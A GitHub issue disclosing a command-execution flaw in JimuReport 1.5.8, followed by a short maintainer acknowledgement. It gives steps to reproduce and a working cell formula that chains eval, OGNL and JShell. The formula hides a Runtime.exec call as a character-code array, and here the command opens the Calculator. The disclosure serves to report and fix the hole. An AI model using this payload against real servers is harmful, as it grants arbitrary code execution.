### ISSUE TITLE
A New Potential Security Issue in JimuReport

### ISSUE THREAD

**Issue by cokeBeer** [jeecgboot/JimuReport#1809]
##### 版本号：
1.5.8 (lastest)

##### 问题描述：
Hi, I found a potential security issue in JimuReport, **which may lead to comand execution.**

##### 错误日志&截图：
<img width="960" alt="image" src="https://github.com/jeecgboot/JimuReport/assets/70683161/83474876-ab4e-4368-91ff-d7095fb02000">

##### 重现步骤：
0. Prepare environment
```
jimureport-springboot-starter 1.5.8
jdk9+
```
1. Start jimureport
<img width="766" alt="image" src="https://github.com/jeecgboot/JimuReport/assets/70683161/4382d198-af4c-478e-b8e1-d4c3d72659bf">

2. Click "新建报表" to create a new report,  edit a cell as below:
<img width="1513" alt="image" src="https://github.com/jeecgboot/JimuReport/assets/70683161/2804fcf1-ecde-47f2-bee0-3c1aac85e301">

The value is:

```
=eval("c=Class.forName('ognl.Ognl');c.getValue(\"@jdk.jshell.JShell@create().eval(new String (new char[]{106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,34,111,112,101,110,32,47,83,121,115,116,101,109,47,65,112,112,108,105,99,97,116,105,111,110,115,47,67,97,108,99,117,108,97,116,111,114,46,97,112,112,34,41}))\",new Object())")
```
3. Click "保存" and "预览", you will see a Calculator pop out, proving that the comand is executed.

**Comment by lvdandan16** [comment]
收录 ty
